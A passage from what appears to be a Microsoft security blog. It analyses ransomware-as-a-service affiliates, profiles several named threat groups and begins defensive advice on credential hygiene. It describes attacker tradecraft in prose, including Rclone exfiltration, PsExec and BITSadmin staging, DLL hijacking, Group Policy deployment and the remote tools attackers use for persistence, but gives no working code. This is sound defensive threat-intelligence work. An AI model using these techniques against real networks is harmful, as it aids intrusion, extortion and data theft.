example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps 